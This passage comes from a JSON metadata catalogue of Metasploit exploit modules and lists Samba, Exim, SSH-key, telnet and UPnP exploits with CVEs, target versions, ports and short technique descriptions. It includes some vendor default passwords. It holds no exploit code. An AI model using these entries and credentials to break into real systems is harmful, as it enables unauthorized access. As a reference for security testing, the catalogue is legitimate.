],
"targets": [
"Linux Bruteforce"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/proxy/squid_ntlm_authenticate.rb",
"is_install_path": true,
"ref_name": "linux/proxy/squid_ntlm_authenticate",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/samba/chain_reply": {
"name": "Samba chain_reply Memory Corruption (Linux x86)",
"full_name": "exploit/linux/samba/chain_reply",
"rank": 400,
"disclosure_date": "2010-06-16",
"type": "exploit",
"author": [
"Jun Mao",
"jduck <jduck@metasploit.com>"
],
"description": "This exploits a memory corruption vulnerability present in Samba versions\n prior to 3.3.13. When handling chained response packets, Samba fails to validate\n the offset value used when building the next part. By setting this value to a\n number larger than the destination buffer size, an attacker can corrupt memory.\n Additionally, setting this value to a value smaller than 'smb_wct' (0x24) will\n cause the header of the input buffer chunk to be corrupted.\n\n After close inspection, it appears that 3.0.x versions of Samba are not\n exploitable. Since they use an \"InputBuffer\" size of 0x20441, an attacker cannot\n cause memory to be corrupted in an exploitable way. It is possible to corrupt the\n heap header of the \"InputBuffer\", but it didn't seem possible to get the chunk\n to be processed again prior to process exit.\n\n In order to gain code execution, this exploit attempts to overwrite a \"talloc\n chunk\" destructor function pointer.\n\n This particular module is capable of exploiting the flaw on x86 Linux systems\n that do not have the nx memory protection.\n\n NOTE: It is possible to make exploitation attempts indefinitely since Samba forks\n for user sessions in the default configuration.",
"references": [
"CVE-2010-2063",
"OSVDB-65518",
"URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=873"
],
"platform": "Linux",
"arch": "",
"rport": 139,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": [
"Linux (Debian5 3.2.5-4lenny6)",
"Debugging Target"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/samba/chain_reply.rb",
"is_install_path": true,
"ref_name": "linux/samba/chain_reply",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/samba/is_known_pipename": {
"name": "Samba is_known_pipename() Arbitrary Module Load",
"full_name": "exploit/linux/samba/is_known_pipename",
"rank": 600,
"disclosure_date": "2017-03-24",
"type": "exploit",
"author": [
"steelo <knownsteelo@gmail.com>",
"hdm <x@hdm.io>",
"bcoles <bcoles@gmail.com>"
],
"description": "This module triggers an arbitrary shared library load vulnerability\n in Samba versions 3.5.0 to 4.4.14, 4.5.10, and 4.6.4. This module\n requires valid credentials, a writeable folder in an accessible share,\n and knowledge of the server-side path of the writeable folder. In\n some cases, anonymous access combined with common filesystem locations\n can be used to automatically exploit this vulnerability.",
"references": [
"CVE-2017-7494",
"URL-https://www.samba.org/samba/security/CVE-2017-7494.html"
],
"platform": "Linux",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": [
"Automatic (Interact)",
"Automatic (Command)",
"Linux x86",
"Linux x86_64",
"Linux ARM (LE)",
"Linux ARM64",
"Linux MIPS",
"Linux MIPSLE",
"Linux MIPS64",
"Linux MIPS64LE",
"Linux PPC",
"Linux PPC64",
"Linux PPC64 (LE)",
"Linux SPARC",
"Linux SPARC64",
"Linux s390x"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/linux/samba/is_known_pipename.rb",
"is_install_path": true,
"ref_name": "linux/samba/is_known_pipename",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_linux/samba/lsa_transnames_heap": {
"name": "Samba lsa_io_trans_names Heap Overflow",
"full_name": "exploit/linux/samba/lsa_transnames_heap",
"rank": 400,
"disclosure_date": "2007-05-14",
"type": "exploit",
"author": [
"Ramon de C Valle <rcvalle@metasploit.com>",
"Adriano Lima <adriano@risesecurity.org>",
"hdm <x@hdm.io>"
],
"description": "This module triggers a heap overflow in the LSA RPC service\n of the Samba daemon. This module uses the TALLOC chunk overwrite\n method (credit Ramon and Adriano), which only works with Samba\n versions 3.0.21-3.0.24. Additionally, this module will not work\n when the Samba \"log level\" parameter is higher than \"2\".",
"references": [
"CVE-2007-2446",
"OSVDB-34699"
],
"platform": "Linux",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": [
"Linux vsyscall",
"Linux Heap Brute Force (Debian/Ubuntu)",
"Linux Heap Brute Force (Gentoo)",
"Linux Heap Brute Force (Mandriva)",
"Linux Heap Brute Force (RHEL/CentOS)",
"Linux Heap Brute Force (SUSE)",
"Linux Heap Brute Force (Slackware)",
"Linux Heap Brute Force (OpenWRT MIPS)",
"DEBUG"
],
"mod_time": "2017-08-28 20:17:58 +0000",
"path": "/modules/exploits/linux/samba/lsa_transnames_heap.rb",
"is_install_path": true,
"ref_name": "linux/samba/lsa_transnames_heap",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/samba/setinfopolicy_heap": {
"name": "Samba SetInformationPolicy AuditEventsInfo Heap Overflow",
"full_name": "exploit/linux/samba/setinfopolicy_heap",
"rank": 300,
"disclosure_date": "2012-04-10",
"type": "exploit",
"author": [
"Unknown",
"blasty",
"mephos",
"sinn3r <sinn3r@metasploit.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module triggers a vulnerability in the LSA RPC service of the Samba daemon\n because of an error on the PIDL auto-generated code. Making a specially crafted\n call to SetInformationPolicy to set a PolicyAuditEventsInformation allows to\n trigger a heap overflow and finally execute arbitrary code with root privileges.\n\n The module uses brute force to guess the stackpivot/rop chain or the system()\n address and redirect flow there in order to bypass NX. The start and stop addresses\n for brute forcing have been calculated empirically. On the other hand the module\n provides the StartBrute and StopBrute which allow the user to configure his own\n addresses.",
"references": [
"CVE-2012-1182",
"OSVDB-81303",
"BID-52973",
"ZDI-12-069"
],
"platform": "Linux,Unix",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": [
"2:3.5.11~dfsg-1ubuntu2 on Ubuntu Server 11.10",
"2:3.5.8~dfsg-1ubuntu2 on Ubuntu Server 11.10",
"2:3.5.8~dfsg-1ubuntu2 on Ubuntu Server 11.04",
"2:3.5.4~dfsg-1ubuntu8 on Ubuntu Server 10.10",
"2:3.5.6~dfsg-3squeeze6 on Debian Squeeze",
"3.5.10-0.107.el5 on CentOS 5"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/samba/setinfopolicy_heap.rb",
"is_install_path": true,
"ref_name": "linux/samba/setinfopolicy_heap",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/samba/trans2open": {
"name": "Samba trans2open Overflow (Linux x86)",
"full_name": "exploit/linux/samba/trans2open",
"rank": 500,
"disclosure_date": "2003-04-07",
"type": "exploit",
"author": [
"hdm <x@hdm.io>",
"jduck <jduck@metasploit.com>"
],
"description": "This exploits the buffer overflow found in Samba versions\n 2.2.0 to 2.2.8. This particular module is capable of\n exploiting the flaw on x86 Linux systems that do not\n have the noexec stack option set.\n\n NOTE: Some older versions of RedHat do not seem to be vulnerable\n since they apparently do not allow anonymous access to IPC.",
"references": [
"CVE-2003-0201",
"OSVDB-4469",
"BID-7294",
"URL-https://seclists.org/bugtraq/2003/Apr/103"
],
"platform": "Linux",
"arch": "",
"rport": 139,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": [
"Samba 2.2.x - Bruteforce"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/linux/samba/trans2open.rb",
"is_install_path": true,
"ref_name": "linux/samba/trans2open",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/smtp/exim4_dovecot_exec": {
"name": "Exim and Dovecot Insecure Configuration Command Injection",
"full_name": "exploit/linux/smtp/exim4_dovecot_exec",
"rank": 600,
"disclosure_date": "2013-05-03",
"type": "exploit",
"author": [
"Unknown",
"eKKiM",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a command injection vulnerability against Dovecot with\n Exim using the \"use_shell\" option. It uses the sender's address to inject arbitrary\n commands, since this is one of the user-controlled variables. It has been\n successfully tested on Debian Squeeze using the default Exim4 with the dovecot-common\n packages.",
"references": [
"OSVDB-93004",
"EDB-25297",
"URL-https://www.redteam-pentesting.de/advisories/rt-sa-2013-001"
],
"platform": "Linux",
"arch": "x86",
"rport": 25,
"autofilter_ports": [
25,
465,
587,
2525,
25025,
25000
],
"autofilter_services": [
"smtp",
"smtps"
],
"targets": [
"Linux x86"
],
"mod_time": "2017-08-28 20:17:58 +0000",
"path": "/modules/exploits/linux/smtp/exim4_dovecot_exec.rb",
"is_install_path": true,
"ref_name": "linux/smtp/exim4_dovecot_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/smtp/exim_gethostbyname_bof": {
"name": "Exim GHOST (glibc gethostbyname) Buffer Overflow",
"full_name": "exploit/linux/smtp/exim_gethostbyname_bof",
"rank": 500,
"disclosure_date": "2015-01-27",
"type": "exploit",
"author": [
"Unknown"
],
"description": "This module remotely exploits CVE-2015-0235, aka GHOST, a heap-based\n buffer overflow in the GNU C Library's gethostbyname functions on x86\n and x86_64 GNU/Linux systems that run the Exim mail server.",
"references": [
"CVE-2015-0235",
"US-CERT-VU-967332",
"OSVDB-117579",
"BID-72325",
"URL-https://www.qualys.com/research/security-advisories/GHOST-CVE-2015-0235.txt",
"URL-https://community.qualys.com/blogs/laws-of-vulnerabilities/2015/01/27/the-ghost-vulnerability",
"URL-http://r-7.co/1CAnMc0"
],
"platform": "Unix",
"arch": "cmd",
"rport": 25,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/smtp/exim_gethostbyname_bof.rb",
"is_install_path": true,
"ref_name": "linux/smtp/exim_gethostbyname_bof",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/smtp/haraka": {
"name": "Haraka SMTP Command Injection",
"full_name": "exploit/linux/smtp/haraka",
"rank": 600,
"disclosure_date": "2017-01-26",
"type": "exploit",
"author": [
"xychix <xychix[AT]hotmail.com>",
"smfreegard",
"Adam Cammack <adam_cammack[AT]rapid7.com>"
],
"description": "The Haraka SMTP server comes with a plugin for processing attachments.\n Versions before 2.8.9 can be vulnerable to command injection",
"references": [
"CVE-2016-1000282",
"EDB-41162",
"URL-https://github.com/haraka/Haraka/pull/1606"
],
"platform": "Linux",
"arch": "x64, x86",
"rport": 25,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"linux x64",
"linux x86"
],
"mod_time": "2018-12-14 22:27:11 +0000",
"path": "/modules/exploits/linux/smtp/haraka.py",
"is_install_path": true,
"ref_name": "linux/smtp/haraka",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"AKA": [
"Harakiri"
]
}
},
"exploit_linux/ssh/ceragon_fibeair_known_privkey": {
"name": "Ceragon FibeAir IP-10 SSH Private Key Exposure",
"full_name": "exploit/linux/ssh/ceragon_fibeair_known_privkey",
"rank": 600,
"disclosure_date": "2015-04-01",
"type": "exploit",
"author": [
"hdm <x@hdm.io>",
"todb <todb@metasploit.com>"
],
"description": "Ceragon ships a public/private key pair on FibeAir IP-10 devices\n that allows passwordless authentication to any other IP-10 device.\n Since the key is easily retrievable, an attacker can use it to\n gain unauthorized remote access as the \"mateidu\" user.",
"references": [
"CVE-2015-0936",
"URL-https://gist.github.com/todb-r7/5d86ecc8118f9eeecc15"
],
"platform": "Unix",
"arch": "cmd",
"rport": 22,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Universal"
],
"mod_time": "2018-08-15 21:27:40 +0000",
"path": "/modules/exploits/linux/ssh/ceragon_fibeair_known_privkey.rb",
"is_install_path": true,
"ref_name": "linux/ssh/ceragon_fibeair_known_privkey",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/ssh/exagrid_known_privkey": {
"name": "ExaGrid Known SSH Key and Default Password",
"full_name": "exploit/linux/ssh/exagrid_known_privkey",
"rank": 600,
"disclosure_date": "2016-04-07",
"type": "exploit",
"author": [
"egypt <egypt@metasploit.com>"
],
"description": "ExaGrid ships a public/private key pair on their backup appliances to\n allow passwordless authentication to other ExaGrid appliances. Since\n the private key is easily retrievable, an attacker can use it to gain\n unauthorized remote access as root. Additionally, this module will\n attempt to use the default password for root, 'inflection'.",
"references": [
"CVE-2016-1560",
"CVE-2016-1561",
"URL-https://community.rapid7.com/community/infosec/blog/2016/04/07/r7-2016-04-exagrid-backdoor-ssh-keys-and-hardcoded-credentials"
],
"platform": "Unix",
"arch": "cmd",
"rport": 22,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Universal"
],
"mod_time": "2018-08-15 21:27:40 +0000",
"path": "/modules/exploits/linux/ssh/exagrid_known_privkey.rb",
"is_install_path": true,
"ref_name": "linux/ssh/exagrid_known_privkey",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/ssh/f5_bigip_known_privkey": {
"name": "F5 BIG-IP SSH Private Key Exposure",
"full_name": "exploit/linux/ssh/f5_bigip_known_privkey",
"rank": 600,
"disclosure_date": "2012-06-11",
"type": "exploit",
"author": [
"egypt <egypt@metasploit.com>"
],
"description": "F5 ships a public/private key pair on BIG-IP appliances that allows\n passwordless authentication to any other BIG-IP box. Since the key is\n easily retrievable, an attacker can use it to gain unauthorized remote\n access as root.",
"references": [
"URL-https://www.trustmatta.com/advisories/MATTA-2012-002.txt",
"CVE-2012-1493",
"OSVDB-82780",
"URL-https://community.rapid7.com/community/metasploit/blog/2012/06/25/press-f5-for-root-shell"
],
"platform": "Unix",
"arch": "cmd",
"rport": 22,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Universal"
],
"mod_time": "2018-08-15 21:27:40 +0000",
"path": "/modules/exploits/linux/ssh/f5_bigip_known_privkey.rb",
"is_install_path": true,
"ref_name": "linux/ssh/f5_bigip_known_privkey",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/ssh/loadbalancerorg_enterprise_known_privkey": {
"name": "Loadbalancer.org Enterprise VA SSH Private Key Exposure",
"full_name": "exploit/linux/ssh/loadbalancerorg_enterprise_known_privkey",
"rank": 600,
"disclosure_date": "2014-03-17",
"type": "exploit",
"author": [
"xistence <xistence@0x90.nl>"
],
"description": "Loadbalancer.org ships a public/private key pair on Enterprise virtual appliances\n version 7.5.2 that allows passwordless authentication to any other LB Enterprise box.\n Since the key is easily retrievable, an attacker can use it to gain unauthorized remote\n access as root.",
"references": [
"PACKETSTORM-125754"
],
"platform": "Unix",
"arch": "cmd",
"rport": 22,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Universal"
],
"mod_time": "2018-08-15 14:54:41 +0000",
"path": "/modules/exploits/linux/ssh/loadbalancerorg_enterprise_known_privkey.rb",
"is_install_path": true,
"ref_name": "linux/ssh/loadbalancerorg_enterprise_known_privkey",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/ssh/mercurial_ssh_exec": {
"name": "Mercurial Custom hg-ssh Wrapper Remote Code Exec",
"full_name": "exploit/linux/ssh/mercurial_ssh_exec",
"rank": 600,
"disclosure_date": "2017-04-18",
"type": "exploit",
"author": [
"claudijd"
],
"description": "This module takes advantage of custom hg-ssh wrapper implementations that don't\n adequately validate parameters passed to the hg binary, allowing users to trigger a\n Python Debugger session, which allows arbitrary Python code execution.",
"references": [
"CVE-2017-9462",
"URL-https://www.mercurial-scm.org/wiki/WhatsNew#Mercurial_4.1.3_.282017-4-18.29"
],
"platform": "Python",
"arch": "python",
"rport": 22,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2018-08-24 18:08:15 +0000",
"path": "/modules/exploits/linux/ssh/mercurial_ssh_exec.rb",
"is_install_path": true,
"ref_name": "linux/ssh/mercurial_ssh_exec",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_linux/ssh/quantum_dxi_known_privkey": {
"name": "Quantum DXi V1000 SSH Private Key Exposure",
"full_name": "exploit/linux/ssh/quantum_dxi_known_privkey",
"rank": 600,
"disclosure_date": "2014-03-17",
"type": "exploit",
"author": [
"xistence <xistence@0x90.nl>"
],
"description": "Quantum ships a public/private key pair on DXi V1000 2.2.1 appliances that\n allows passwordless authentication to any other DXi box. Since the key is\n easily retrievable, an attacker can use it to gain unauthorized remote\n access as root.",
"references": [
"PACKETSTORM-125755"
],
"platform": "Unix",
"arch": "cmd",
"rport": 22,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Universal"
],
"mod_time": "2018-08-15 21:27:40 +0000",
"path": "/modules/exploits/linux/ssh/quantum_dxi_known_privkey.rb",
"is_install_path": true,
"ref_name": "linux/ssh/quantum_dxi_known_privkey",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/ssh/quantum_vmpro_backdoor": {
"name": "Quantum vmPRO Backdoor Command",
"full_name": "exploit/linux/ssh/quantum_vmpro_backdoor",
"rank": 600,
"disclosure_date": "2014-03-17",
"type": "exploit",
"author": [
"xistence <xistence@0x90.nl>"
],
"description": "This module abuses a backdoor command in Quantum vmPRO. Any user, even one without admin\n privileges, can get access to the restricted SSH shell. By using the hidden backdoor\n \"shell-escape\" command it's possible to drop to a real root bash shell. This module\n has been tested successfully on Quantum vmPRO 3.1.2.",
"references": [
"PACKETSTORM-125760"
],
"platform": "Unix",
"arch": "cmd",
"rport": 22,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Quantum vmPRO 3.1.2"
],
"mod_time": "2018-12-12 15:41:35 +0000",
"path": "/modules/exploits/linux/ssh/quantum_vmpro_backdoor.rb",
"is_install_path": true,
"ref_name": "linux/ssh/quantum_vmpro_backdoor",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_linux/ssh/solarwinds_lem_exec": {
"name": "SolarWind LEM Default SSH Password Remote Code Execution",
"full_name": "exploit/linux/ssh/solarwinds_lem_exec",
"rank": 600,
"disclosure_date": "2017-03-17",
"type": "exploit",
"author": [
"Mehmet Ince <mehmet@mehmetince.net>"
],
"description": "This module exploits the default credentials of SolarWind LEM. A menu system is encountered when the SSH\n service is accessed with the default username and password which is \"cmc\" and \"password\". By exploiting a\n vulnerability that exist on the menuing script, an attacker can escape from restricted shell.\n\n This module was tested against SolarWinds LEM v6.3.1.",
"references": [
"CVE-2017-7722",
"URL-http://pentest.blog/unexpected-journey-4-escaping-from-restricted-shell-and-gaining-root-access-to-solarwinds-log-event-manager-siem-product/"
],
"platform": "Python",
"arch": "python",
"rport": 32022,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2018-08-15 21:27:40 +0000",
"path": "/modules/exploits/linux/ssh/solarwinds_lem_exec.rb",
"is_install_path": true,
"ref_name": "linux/ssh/solarwinds_lem_exec",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_linux/ssh/symantec_smg_ssh": {
"name": "Symantec Messaging Gateway 9.5 Default SSH Password Vulnerability",
"full_name": "exploit/linux/ssh/symantec_smg_ssh",
"rank": 600,
"disclosure_date": "2012-08-27",
"type": "exploit",
"author": [
"Stefan Viehbock",
"Ben Williams",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a default misconfiguration flaw on Symantec Messaging Gateway.\n The 'support' user has a known default password, which can be used to login to the\n SSH service, and gain privileged access from remote.",
"references": [
"CVE-2012-3579",
"OSVDB-85028",
"BID-55143",
"URL-http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&suid=20120827_00"
],
"platform": "Unix",
"arch": "cmd",
"rport": 22,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Symantec Messaging Gateway 9.5"
],
"mod_time": "2018-12-12 15:41:35 +0000",
"path": "/modules/exploits/linux/ssh/symantec_smg_ssh.rb",
"is_install_path": true,
"ref_name": "linux/ssh/symantec_smg_ssh",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/ssh/ubiquiti_airos_file_upload": {
"name": "Ubiquiti airOS Arbitrary File Upload",
"full_name": "exploit/linux/ssh/ubiquiti_airos_file_upload",
"rank": 600,
"disclosure_date": "2016-02-13",
"type": "exploit",
"author": [
"93c08539",
"wvu <wvu@metasploit.com>"
],
"description": "This module exploits a pre-auth file upload to install a new root user\n to /etc/passwd and an SSH key to /etc/dropbear/authorized_keys.\n\n FYI, /etc/{passwd,dropbear/authorized_keys} will be overwritten.\n /etc/persistent/rc.poststart will be overwritten if PERSIST_ETC is true.\n\n This method is used by the \"mf\" malware infecting these devices.",
"references": [
"EDB-39701",
"URL-https://hackerone.com/reports/73480"
],
"platform": "Unix",
"arch": "cmd",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Ubiquiti airOS < 5.6.2"
],
"mod_time": "2018-11-16 12:18:28 +0000",
"path": "/modules/exploits/linux/ssh/ubiquiti_airos_file_upload.rb",
"is_install_path": true,
"ref_name": "linux/ssh/ubiquiti_airos_file_upload",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/ssh/vmware_vdp_known_privkey": {
"name": "VMware VDP Known SSH Key",
"full_name": "exploit/linux/ssh/vmware_vdp_known_privkey",
"rank": 600,
"disclosure_date": "2016-12-20",
"type": "exploit",
"author": [
"phroxvs"
],
"description": "VMware vSphere Data Protection appliances 5.5.x through 6.1.x contain a known ssh private key for the local user admin who is a sudoer without password.",
"references": [
"CVE-2016-7456",
"URL-https://www.vmware.com/security/advisories/VMSA-2016-0024.html"
],
"platform": "Unix",
"arch": "cmd",
"rport": 22,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Universal"
],
"mod_time": "2018-12-12 15:41:35 +0000",
"path": "/modules/exploits/linux/ssh/vmware_vdp_known_privkey.rb",
"is_install_path": true,
"ref_name": "linux/ssh/vmware_vdp_known_privkey",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/telnet/netgear_telnetenable": {
"name": "NETGEAR TelnetEnable",
"full_name": "exploit/linux/telnet/netgear_telnetenable",
"rank": 600,
"disclosure_date": "2009-10-30",
"type": "exploit",
"author": [
"Paul Gebheim",
"insanid",
"wvu <wvu@metasploit.com>"
],
"description": "This module sends a magic packet to a NETGEAR device to enable telnetd.\n Upon successful connect, a root shell should be presented to the user.",
"references": [
"URL-https://wiki.openwrt.org/toh/netgear/telnet.console",
"URL-https://github.com/cyanitol/netgear-telenetenable",
"URL-https://github.com/insanid/netgear-telenetenable"
],
"platform": "Unix",
"arch": "cmd",
"rport": 23,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic (detect TCP or UDP)",
"TCP (typically older devices)",
"UDP (typically newer devices)"
],
"mod_time": "2019-03-05 21:02:39 +0000",
"path": "/modules/exploits/linux/telnet/netgear_telnetenable.rb",
"is_install_path": true,
"ref_name": "linux/telnet/netgear_telnetenable",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_linux/telnet/telnet_encrypt_keyid": {
"name": "Linux BSD-derived Telnet Service Encryption Key ID Buffer Overflow",
"full_name": "exploit/linux/telnet/telnet_encrypt_keyid",
"rank": 500,
"disclosure_date": "2011-12-23",
"type": "exploit",
"author": [
"Jaime Penalba Estebanez <jpenalbae@gmail.com>",
"Brandon Perry <bperry.volatile@gmail.com>",
"Dan Rosenberg",
"hdm <x@hdm.io>"
],
"description": "This module exploits a buffer overflow in the encryption option handler of the\n Linux BSD-derived telnet service (inetutils or krb5-telnet). Most Linux distributions\n use NetKit-derived telnet daemons, so this flaw only applies to a small subset of\n Linux systems running telnetd.",
"references": [
"CVE-2011-4862",
"OSVDB-78020",
"BID-51182",
"EDB-18280"
],
"platform": "Linux",
"arch": "",
"rport": 23,
"autofilter_ports": [
23
],
"autofilter_services": [
"telnet"
],
"targets": [
"Automatic",
"Red Hat Enterprise Linux 3 (krb5-telnet)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/telnet/telnet_encrypt_keyid.rb",
"is_install_path": true,
"ref_name": "linux/telnet/telnet_encrypt_keyid",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/upnp/belkin_wemo_upnp_exec": {
"name": "Belkin Wemo UPnP Remote Code Execution",
"full_name": "exploit/linux/upnp/belkin_wemo_upnp_exec",
"rank": 600,
"disclosure_date": "2014-04-04",
"type": "exploit",
"author": [
"phikshun",
"wvu <wvu@metasploit.com>",
"nstarke"
],
"description": "This module exploits a command injection in the Belkin Wemo UPnP API via\n the SmartDevURL argument to the SetSmartDevInfo action.\n\n This module has been tested on a Wemo-enabled Crock-Pot, but other Wemo\n devices are known to be affected, albeit on a different RPORT (49153).",
"references": [
"URL-https://web.archive.org/web/20150901094849/http://disconnected.io/2014/04/04/universal-plug-and-fuzz/",
"URL-https://github.com/phikshun/ufuzz",
"URL-https://gist.github.com/phikshun/10900566",
"URL-https://gist.github.com/phikshun/9984624",
"URL-https://www.crock-pot.com/wemo-landing-page.html",
"URL-https://www.belkin.com/us/support-article?articleNum=101177",
"URL-http://www.wemo.com/"
],
"platform": "Linux,Unix",
"arch": "cmd, mipsle",
"rport": 49152,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Unix In-Memory",
"Linux Dropper"
],
"mod_time": "2019-04-24 11:39:34 +0000",
"path": "/modules/exploits/linux/upnp/belkin_wemo_upnp_exec.rb",
"is_install_path": true,
"ref_name": "linux/upnp/belkin_wemo_upnp_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"NOCVE": "Patched in 2.00.8643 without vendor disclosure",
"Stability": [
"crash-safe"
],
"SideEffects": [
"artifacts-on-disk"
],
"Reliability": [
"repeatable-session"
]
}
},
"exploit_linux/upnp/dlink_upnp_msearch_exec": {
"name": "D-Link Unauthenticated UPnP M-SEARCH Multicast Command Injection",
"full_name": "exploit/linux/upnp/dlink_upnp_msearch_exec",
"rank": 600,
"disclosure_date": "2013-02-01",
"type": "exploit",
"author": [
"Zachary Cutlip",
"Michael Messner <devnull@s3cur1ty.de>"
],
"description": "Different D-Link Routers are vulnerable to OS command injection via UPnP Multicast\n requests. This module has been tested on DIR-300 and DIR-645 devices. Zachary Cutlip\n has initially reported the DIR-815 vulnerable. Probably there are other devices also\n affected.",
"references": [
"URL-https://github.com/zcutlip/exploit-poc/tree/master/dlink/dir-815-a1/upnp-command-injection",
"URL-http://shadow-file.blogspot.com/2013/02/dlink-dir-815-upnp-command-injection.html"
],
"platform": "",
"arch": "",
"rport": 1900,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"MIPS Little Endian",
"MIPS Big Endian"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/upnp/dlink_upnp_msearch_exec.rb",
"is_install_path": true,
"ref_name": "linux/upnp/dlink_upnp_msearch_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/upnp/miniupnpd_soap_bof": {
"name": "MiniUPnPd 1.0 Stack Buffer Overflow Remote Code Execution",
"full_name": "exploit/linux/upnp/miniupnpd_soap_bof",
"rank": 300,
"disclosure_date": "2013-03-27",
"type": "exploit",
"author": [
"hdm <x@hdm.io>",
"Dejan Lukan",
"Onur ALANBEL",
"Michael Messner <devnull@s3cur1ty.de>"
],
"description": "This module exploits the MiniUPnP 1.0 SOAP stack buffer overflow vulnerability\n present in the SOAPAction HTTP header handling.",
"references": [
"CVE-2013-0230",
"OSVDB-89624",
"BID-57608",
"URL-https://community.rapid7.com/community/infosec/blog/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play"
],
"platform": "Linux",
"arch": "x86, mipsbe",
"rport": 5555,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Debian GNU/Linux 6.0 / MiniUPnPd 1.0",
"Airties RT-212 v1.2.0.23 / MiniUPnPd 1.0"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/upnp/miniupnpd_soap_bof.rb",
"is_install_path": true,
"ref_name": "linux/upnp/miniupnpd_soap_bof",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_mainframe/ftp/ftp_jcl_creds": {
"name": "FTP JCL Execution",
"full_name": "exploit/mainframe/ftp/ftp_jcl_creds",
"rank": 300,
"disclosure_date": "2013-05-12",
"type": "exploit",
"author": [
"Bigendian Smalls",
"mainframed a.k.a. soldier of fortran",
"S&Oxballs a.k.a. chiefascot"
],
"description": "(Submit JCL to z/OS via FTP and SITE FILE=JES.\n This exploit requires valid credentials on the target system)",
"references": [
],
"platform": "Mainframe",
"arch": "cmd",
"rport": 21,
"autofilter_ports": [
21,
2121
],
"autofilter_services": [
"ftp"
],
"targets": [
"Automatic"
],
"mod_time": "2018-08-09 23:34:03 +0000",
"path": "/modules/exploits/mainframe/ftp/ftp_jcl_creds.rb",
"is_install_path": true,
"ref_name": "mainframe/ftp/ftp_jcl_creds",
"check": true,
"post_auth": true,
